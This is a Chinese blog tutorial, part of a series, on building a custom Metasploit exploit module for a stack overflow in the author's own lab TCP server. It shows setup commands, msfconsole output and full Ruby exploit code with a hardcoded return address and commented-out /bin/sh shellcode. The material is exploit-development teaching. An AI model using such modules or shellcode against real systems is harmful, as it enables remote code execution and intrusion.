• 使用metasploit进行栈溢出攻击-4


    有了漏洞我们就可以进行攻击了。首先我们需要了解metasploit的exploit模块,具体可以看

    http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

    metasploit本身功能非常强大,这里不多做介绍。

    首先我们需要添加一个针对这个漏洞的exploit模块,

    我们直接在样例上进行修改:

    root@bt:~/.msf4/modules# mkdir exploits
    root@bt:~/.msf4/modules# cd exploits
    root@bt:~/.msf4/modules/exploits# mkdir linux
    root@bt:~/.msf4/modules/exploits/linux# cp /pentest/exploits/framework/documentation/samples/modules/exploits/sample.rb  myvictim.rb
    root@bt:~/.msf4/modules/exploits/linux# ls
    myvictim.rb  myvictimserver.rb  proftp_sreplace.rb

    然后查看myvictim.rb

    ##
    # $Id: sample.rb 9212 2010-05-03 17:13:09Z jduck $
    ##
    
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    
    require 'msf/core'
    
    module Msf
    
    ###
    #
    # This exploit sample shows how an exploit module could be written to exploit
    # a bug in an arbitrary TCP server.
    #
    ###
    class Exploits::Sample < Msf::Exploit::Remote
    
            #
            # This exploit affects TCP servers, so we use the TCP client mixin.
            #
            include Exploit::Remote::Tcp
    
            def initialize(info = {})
                    super(update_info(info,
                            'Name'           => 'Sample exploit',
                            'Description'    => %q{
                                            This exploit module illustrates how a vu
    lnerability could be exploited
                                    in an TCP server that has a parsing bug.
                            },
                            'Author'         => 'skape',
                            'Version'        => '$Revision: 9212 $',
                            'References'     =>
                                    [
                                    ],
                            'Payload'        =>
                                    {
                                            'Space'    => 1000,
                                            'BadChars' => "x00",
                                    },
                            'Targets'        =>
                                    [
                                            # Target 0: Windows All
                                            [
                                                    'Windows Universal',
                                                    {
                                                            'Platform' => 'win',
                                                            'Ret'      => 0x41424344
                                                    }
                                            ],
                                    ],
                            'DefaultTarget' => 0))
            end
    
            #
            # The sample exploit just indicates that the remote host is always
            # vulnerable.
            #
            def check
                    return Exploit::CheckCode::Vulnerable
            end
    
            #
            # The exploit method connects to the remote service and sends 1024 A's
            # followed by the fake return address and then the payload.
            #
            def exploit
                    connect
    
                    print_status("Sending #{payload.encoded.length} byte payload..."
    )
    
                    # Build the buffer for transmission
                    buf  = "A" * 1024
                    buf += [ target.ret ].pack('V')
                    buf += payload.encoded
    
                    # Send it off
                    sock.put(buf)
                    sock.get
    
                    handler
            end
    
    end
    
    end

    然后我们需要把他添加进metasploit,运行reload_all


    =[ metasploit v4.0.0-release [core:4.0 api:1.0]
    + -- --=[ 719 exploits - 361 auxiliary - 68 post
    + -- --=[ 226 payloads - 27 encoders - 8 nops
    =[ svn r13462 updated 1208 days ago (2011.08.01)

    Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
    We recommend that you update the framework at least every other day.
    For information on updating your copy of Metasploit, please see:
    https://community.rapid7.com/docs/DOC-1306

    msf > reload_all

    msf > use exploit/linux/my
    use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictimserver
    use exploit/linux/mysql/mysql_yassl_hello
    msf > use exploit/linux/my

    这里并没有列出来我们刚刚添加的模块,说明模块有问题,必须修改,修改如下:

    ##
    # $Id: myvictimserver.rb 9212 2014-11-03 17:13:09Z jduck $
    ##
    
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    
    require 'msf/core'
    
    
    
    ###
    #
    # This exploit sample shows how an exploit module could be written to exploit
    # a bug in an arbitrary TCP server.
    #
    ###
    class Metasploit3 < Msf::Exploit::Remote
        Rank = GreatRanking
        #
        # This exploit affects TCP servers, so we use the TCP client mixin.
        #
        include Exploit::Remote::Tcp
    
        def initialize(info = {})
            super(update_info(info,
                'Name'           => 'MyVictimSever',
                'Description'    => %q{
                        This exploit module illustrates how a vulnerability could be exploited
                    in an TCP server that has a stackoverflow bug.
                },
                'Author'         => 'bai',
                'Version'        => '$Revision: 9212 $',
                'References'     =>
                    [
                    ],
                'Payload'        =>
                    {
                        'Space'    => 116, #
                        'BadChars' => "x00",
                    },
                'Targets'        =>
                    [
                        # Target 0: Windows All
                        [
                            'MyVictimSever run on linux',
                            {
                                'Platform' => 'Linux',
                                'Ret'      =>  0xbffff4a4
                            }
                        ],
                    ],
                'DefaultTarget' => 0))
        end
    
        #
        # The sample exploit just indicates that the remote host is always
        # vulnerable.
        #
        def check
            return Exploit::CheckCode::Vulnerable
        end
    
        #
        # The exploit method connects to the remote service and sends 1024 A's
        # followed by the fake return address and then the payload.
        #
        def exploit
            connect
    
            print_status("Sending #{payload.encoded.length} byte payload...")
    
            # Build the buffer for transmission
            buf="";
            #buf  = "x90" * 15
            #buf+="xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" 
            #buf+="x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" 
            #buf+="x80xe8xdcxffxffxff/bin/sh";
            buf+="xa4xf4xffxbf"
            buf += payload.encoded
            buf += [].fill( target.ret,0,100).pack('V*')
    
            # Send it off
            sock.put(buf)
            sock.get
    
            handler
        end
    
    end

    这时候,我们就可以找到这个模块了。

    msf > use exploit/linux/my
    use exploit/linux/mysql/mysql_yassl_getname  use exploit/linux/myvictim
    use exploit/linux/mysql/mysql_yassl_hello    use exploit/linux/myvictimserver
    msf > use exploit/linux/my
  • 相关阅读:
    2016多校赛1 A 期望 B SG博弈,状压 D 倍增,二分
    POWOJ 1739: 魔术球问题 DAG最小路径覆盖转最大流
    Codeforces 743D 树形dp
    线性规划与网络流24题 索引
    WangEditor富文本编辑器的简单使用,并将文本数据发往后台
    SSRF
    关于Blind XXE
    blind xxe攻击
    linux awk命令详解
    kali
  • 原文地址:https://www.cnblogs.com/baizx/p/4114811.html
Copyright © 2020-2023  润新知